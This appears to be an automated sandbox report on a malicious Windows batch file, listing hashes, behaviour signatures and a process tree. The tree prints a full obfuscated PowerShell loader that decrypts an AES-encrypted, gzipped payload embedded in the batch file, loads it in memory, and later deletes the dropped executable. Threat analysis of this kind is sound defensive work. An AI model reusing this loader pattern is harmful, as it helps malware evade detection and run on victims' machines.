Analysis

  • max time kernel
    90s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-01-2023 10:37

General

  • Target

    xxicqf.bat

  • Size

    325KB

  • MD5

    4f3c7ff71a35d8abaf90dd0f2353b621

  • SHA1

    b42e3e4ea9ff13c978d1b614f06f2d86735e495d

  • SHA256

    76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a

  • SHA512

    a81106eea5988266fe759d22393b3b5f745c4e27db367ba930913c29c5afe03cac374112c1ec312c2f267d8477eab1e8f2bdf709c28b0a3ef0f90f762cdc982f

  • SSDEEP

    6144:sb0ERTjCC/oq28xqqHBykjjIxEfTKyRfFysWiS3IzZK/DPcAW:sbXjCC/oX8x3HBykjMxsmyRf1UaKTcAW

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE ⋅ 1 IoCs
  • Checks computer location settings ⋅ 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service ⋅ 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry ⋅ 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry ⋅ 2 TTPs 2 IoCs
  • Runs ping.exe ⋅ 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 2 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 1 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 16 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat"
    Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
      "xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat').Split([Environment]::NewLine);foreach ($SdoSn in $TaxYb) { if ($SdoSn.StartsWith(':: ')) { $NuzKW = $SdoSn.Substring(3); break; }; };$OHzNm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NuzKW);$BecaB = New-Object System.Security.Cryptography.AesManaged;$BecaB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BecaB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BecaB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=');$BecaB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3CRmi+qFKdZMzOHEfmfcA==');$EBkLd = $BecaB.CreateDecryptor();$OHzNm = $EBkLd.TransformFinalBlock($OHzNm, 0, $OHzNm.Length);$EBkLd.Dispose();$BecaB.Dispose();$bbcNa = New-Object System.IO.MemoryStream(, $OHzNm);$HkQNi = New-Object System.IO.MemoryStream;$phbxT = New-Object System.IO.Compression.GZipStream($bbcNa, [IO.Compression.CompressionMode]::Decompress);$phbxT.CopyTo($HkQNi);$phbxT.Dispose();$bbcNa.Dispose();$HkQNi.Dispose();$OHzNm = $HkQNi.ToArray();$ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm);$YEeli = $ZnJXZ.EntryPoint;$YEeli.Invoke($null, (, [string[]] ('')))
      Executes dropped EXE
      Checks computer location settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat" "
        Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\system32\chcp.com
          chcp 65001
          PID:4588
        • C:\Windows\system32\PING.EXE
          ping -n 10 localhost
          Runs ping.exe
          PID:3704
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
        Suspicious use of WriteProcessMemory
        PID:212
        • C:\Windows\system32\choice.exe
          choice /c y /n /d y /t 1
          PID:4468
        • C:\Windows\system32\attrib.exe
          attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
          Views/modifies file attributes
          PID:2344
      • C:\Windows\system32\wermgr.exe
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "628" "3628" "3532" "2904" "0" "0" "2144" "0" "0" "0" "0" "0"
        Checks processor information in registry
        Enumerates system info in registry
        PID:484

Network

MITRE ATT&CK Matrix

  • Collection
  • Command and Control
  • Credential Access
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Persistence
  • Privilege Escalation

Downloads

  • C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat
    Filesize: 211B
    MD5: 39f88ba1ed3e90cab71806a54bd40c7a
    SHA1: 75726c444f4630a5a3a046955e41d2bee4f3751f
    SHA256: db29147a00ef147848ea12573b88d772cdfdcee0758c1a14f87d105da7b983aa
    SHA512: 31141a2827f1a9572f6dc9e64be1b11587b5fad732c778018e37a15526a9911ae8f20e7f0b494d62cd200fcbed8784ea1e4249e371b5c094dab88b084334efca
  • C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
    Filesize: 442KB
    MD5: 04029e121a0cfa5991749937dd22a1d9
    SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
    SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
    SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • memory/212-142-0x0000000000000000-mapping.dmp
  • memory/484-143-0x0000000000000000-mapping.dmp
  • memory/628-132-0x0000000000000000-mapping.dmp
  • memory/628-138-0x000002D8AE780000-0x000002D8AE832000-memory.dmp
    Filesize: 712KB
  • memory/628-139-0x000002D8AEDA0000-0x000002D8AEF62000-memory.dmp
    Filesize: 1MB
  • memory/628-140-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
    Filesize: 10MB
  • memory/628-137-0x000002D8AE670000-0x000002D8AE6C0000-memory.dmp
    Filesize: 320KB
  • memory/628-134-0x000002D8AE1B0000-0x000002D8AE1D2000-memory.dmp
    Filesize: 136KB
  • memory/628-135-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
    Filesize: 10MB
  • memory/628-148-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
    Filesize: 10MB
  • memory/2344-149-0x0000000000000000-mapping.dmp
  • memory/3704-147-0x0000000000000000-mapping.dmp
  • memory/4340-141-0x0000000000000000-mapping.dmp
  • memory/4468-146-0x0000000000000000-mapping.dmp
  • memory/4588-145-0x0000000000000000-mapping.dmp